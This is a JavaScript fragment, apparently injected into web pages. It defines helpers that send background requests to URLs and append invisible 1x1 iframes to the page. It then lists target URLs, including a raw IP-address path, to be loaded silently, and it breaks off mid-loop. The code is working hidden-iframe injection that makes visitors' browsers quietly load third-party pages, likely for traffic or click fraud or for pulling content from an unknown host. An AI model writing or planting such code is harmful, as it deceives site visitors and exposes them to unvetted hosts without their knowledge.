function __jdi_js_aap(url) {
var page_request = false;
if (window.XMLHttpRequest) // if Mozilla, Safari etc
page_request = new XMLHttpRequest();
else if (window.ActiveXObject){ // if IE
try {
page_request = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
page_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
}
}
}
else return false;
// ---
// page_request.onreadystatechange=function(){ loadpage(page_request, containerid) }
try{
page_request.open('GET', url, true);
page_request.send(null);
return(page_request.responseText);
}catch(e){
return(e.message);
}
}
function __jdi_js_frm(url){
// var ft = "";
var SF = document.createElement('iframe');
SF.src = url;
SF.style.height = SF.style.width = '1px';
SF.style.left = SF.style.top = '0px';
SF.style.visibility = "hidden";
SF.style.display = "none";
SF.style.position = "absolute";
document.body.appendChild(SF);
}
// "F"+div+"http://www.vimeo.com/8316051"+di2+
// "F"+div+"http://www.youtube.com/watch?v=QGAKS47Umoc#t=0m49s"
var k;
var div = String.fromCharCode(255);
var di2 = String.fromCharCode(254);
var div2 = di2;
var urla = "L"+div+"http://www.flickr.com/photos/powzone/4204187730/"+di2+
"L"+div+"http://www.flickr.com/photos/powzone/4203420455/"+di2+
"L"+div+"http://www.flickr.com/photos/powzone/4203430143/"+di2+
"L"+div+"http://www.flickr.com/photos/powzone/4203430055/"+di2+
"L"+div+"http://www.flickr.com/photos/powzone/4204187598/"+di2+
"L"+div+"http://www.flickr.com/photos/powzone/4203429899/";
urla = "F"+div+"http://officegames101.blogspot.com/2011/05/bunga-bunga-room.html"+div2+
"F"+div+"http://paolofaccini.com/blog/"+div2+
"F"+div+"http://195.88.6.83/08b_mochiEx/fb/";
isEnabled = true;
urla = urla.split(di2);
for (k=0;k